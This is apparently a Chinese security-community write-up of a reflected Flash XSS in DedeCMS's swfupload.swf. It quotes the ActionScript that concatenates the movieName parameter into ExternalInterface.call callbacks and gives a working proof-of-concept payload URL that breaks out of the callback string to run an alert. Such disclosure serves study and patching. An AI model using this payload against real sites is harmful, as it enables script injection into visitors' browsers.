破绽详情
破绽相关文件images/swfupload/swfupload.swf:
存在问题的源代码:
// Get the movie name
this.movieName = root.loaderInfo.parameters.movieName;
// Configure the callbacks
// The JavaScript tracks all the instances of SWFUpload on a page. We can access the instance
// associated with this SWF file using the movieName. Each callback is accessible by making
// a call directly to it on our instance. There is no error handling for undefined callback functions.
// A developer would have to deliberately remove the default functions,set the variable to null, or remove
// it from the init function.
this.flashReady_Callback = "SWFUpload.instances["" + this.movieName + ""].flashReady";
this.fileDialogStart_Callback = "SWFUpload.instances["" + this.movieName + ""].fileDialogStart";
this.fileQueued_Callback = "SWFUpload.instances["" + this.movieName + ""].fileQueued";
this.fileQueueError_Callback = "SWFUpload.instances["" + this.movieName + ""].fileQueueError";
this.fileDialogComplete_Callback = "SWFUpload.instances["" + this.movieName + ""].fileDialogComplete";
this.uploadStart_Callback = "SWFUpload.instances["" + this.movieName + ""].uploadStart";
this.uploadProgress_Callback = "SWFUpload.instances["" + this.movieName + ""].uploadProgress";
this.uploadError_Callback = "SWFUpload.instances["" + this.movieName + ""].uploadError";
this.uploadSuccess_Callback = "SWFUpload.instances["" + this.movieName + ""].uploadSuccess";
this.uploadComplete_Callback = "SWFUpload.instances["" + this.movieName + ""].uploadComplete";
this.debug_Callback = "SWFUpload.instances["" + this.movieName + ""].debug";
this.testExternalInterface_Callback = "SWFUpload.instances["" + this.movieName + ""].testExternalInterface";
this.cleanUp_Callback = "SWFUpload.instances["" + this.movieName + ""].cleanUp";
this.buttonAction_Callback = "SWFUpload.instances["" + this.movieName + ""].buttonAction";每一个返回值被用作 ExternalInterface.call函数的第一个参数,此函数在当前页面里执行javascript,由于moivename来源于用户的输入(一个flash参数),并且这个SWF能够被直接加载(url里面带参数),招致FlashXss反射型脚本跨站攻击的产生。
1. 访问存在FlashXss的SWF链接加Payload:
http://localhost/dedecms/uploads/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22bug1024%22%29}}//2. Payload:
?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22bug1024%22%29}}//感谢您的来访,获取更多精彩文章请收藏本站。
© 版权声明
本站网络名称:
孤勇者社区
本站永久网址:
https://www.gyzsq.com
网站侵权说明:
本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ324470778删除处理。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
喜欢就支持一下吧
相关推荐
评论 抢沙发
欢迎您留下宝贵的见解!
